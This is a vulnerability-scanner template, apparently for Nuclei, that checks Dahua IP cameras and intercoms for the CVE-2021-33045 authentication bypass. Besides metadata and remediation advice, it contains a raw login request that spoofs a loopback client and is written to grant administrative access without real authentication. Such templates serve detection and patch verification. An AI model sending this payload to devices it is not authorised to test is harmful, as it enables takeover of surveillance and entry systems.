id: CVE-2021-33045

info:
  name: Dahua IPC/VTH/VTO - Authentication Bypass
  author: phantomowl
  severity: critical
  description: |
    An identity authentication bypass vulnerability was found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
  impact: |
    Unauthenticated attackers can bypass device authentication by constructing malicious login packets, gaining full administrative access to Dahua IPC/VTH/VTO devices.
  remediation: |
    Apply firmware updates provided by Dahua to address the authentication bypass vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2021/Oct/13
    - https://www.dahuasecurity.com/aboutUs/trustedCenter/details/582
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-33045
    cwe-id: CWE-287
    epss-score: 0.94171
    epss-percentile: 0.9992
    cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dahuasecurity
    product: ipc-hum7xxx_firmware
  tags: cve,cve2021,dahua,auth-bypass,seclists,kev,vkev,vuln

http:
  - raw:
      - |
        POST /RPC2_Login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "method": "global.login",
          "params": {
            "userName": "admin",
            "ipAddr": "127.0.0.1",
            "loginType": "Loopback",
            "clientType": "Local",
            "authorityType": "Default",
            "passwordType": "Plain",
            "password": "admin"
          },
          "id": 1,
          "session": 0
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"session":'
          - '"result":true'
          - '"keepAliveInterval":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008005e515f616e57ac5570d2328a16221fa29efd9a01dbfa972ee9041c8a40fe502206e7ed0fc2b00a7a97ecc468b66629b74bd072aae4d9e7b8509810d3b511cac96:922c64590222798bb761d5b6d8e72950